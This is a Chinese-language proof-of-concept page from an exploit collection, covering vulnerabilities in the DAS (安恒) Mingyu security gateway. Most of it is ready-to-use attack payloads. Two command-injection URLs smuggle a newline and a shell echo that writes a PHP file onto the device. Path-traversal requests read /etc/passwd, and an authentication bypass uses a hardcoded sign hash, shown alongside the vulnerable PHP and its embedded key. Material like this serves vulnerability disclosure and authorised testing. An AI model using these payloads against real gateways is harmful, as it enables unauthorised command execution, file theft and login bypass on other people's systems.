admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 12:25:11 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/安恒 明御安全网关 命令执行 任意文件读取漏洞.md

100 lines
2.5 KiB
Markdown
Raw Normal View History

update
2024-11-06 14:10:36 +08:00
# 安恒 明御安全网关 命令执行 任意文件读取漏洞
## 漏洞描述
安恒信息明御安全网关存在命令执行漏洞,导致攻击者可以直接执行系统命令,从而控制目标系统。
## 漏洞分析
参考阅读:
- https://r0fus0d.blog.ffffffff0x.com/post/oem-case/
## 漏洞复现
### 命令执行 1
漏洞 URL
```
/webui/?g=aaa_portal_auth_local_submit&suffix=
```
poc
```
/webui/?g=aaa_portal_auth_local_submit&suffix=%0aecho%20%27%3C%3Fphp%20echo%20%22test%20-%20Open%20source%20project%20%28github.com%2Ftest%2Ftest%29%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2F111111112.php&bkg_flag=0
```
### 命令执行 2
漏洞 URL
```
/webui/?g=aaa_portal_auth_config_reset&type=
```
poc
```
/webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22test%20-%20Open%20source%20project%20%28github.com%2Ftest%2Ftest%29%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2F111111111.php%0a
```
### 任意文件读取
poc
```
requests:
- method: GET
path:
- "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../etc/passwd"
- "{{BaseURL}}/webui/?g=sys_dia_data_check&file_name=../../../../../../../../etc/passwd"
- "{{BaseURL}}/webui/?g=sys_capture_file_download&name=../../../../../../../../etc/passwd"
- "{{BaseURL}}/webui/?g=sys_corefile_sysinfo_download&name=../../../../../../../../etc/passwd"
```
### 验证码绕过
poc
```
/remote_auth.php?user=admin&pwd=admin&sign=ba84d9dd91eb304aca57f0a8f052623e
```
其中 sign 硬编码在 `/usr/local/webui/remote_auth.php` 中:
```php
if($_GET['user']!=null) $usr = formatget($_GET['user']);
if($_GET['pwd']!=null) $pwd = formatget($_GET['pwd']);
if($_GET['sign']!=null) $sign = formatget($_GET['sign']);
$key= 'saplingos!@#$%^&*';//这个key你们协商后保存一致即可
//ba84d9dd91eb304aca57f0a8f052623e
if(empty($usr)){
die('user_null');
}
else if(empty($pwd)){
die('pwd_null');
}
else if (!$sign){
die('sign_null');
}
else if ($sign != md5($key)){
die('sign_error');
}
else{
if (isset($usr, $pwd)) {
LoginHandler::login($usr, $pwd, $num,'',$remote_auth = true);
}
$fail_msg = '';
if (LoginHandler::isLoginFail()) {
$fail_msg = $_SESSION[ERROR_STR];
if (strlen($fail_msg) <= 0) {
$fail_msg = LocalUtil::getCommonResource('login_failed');
}
die($fail_msg);
}
}
```
可以通过任意文件读取漏洞读取 key然后进行爆破。
Reference in New Issue Copy Permalink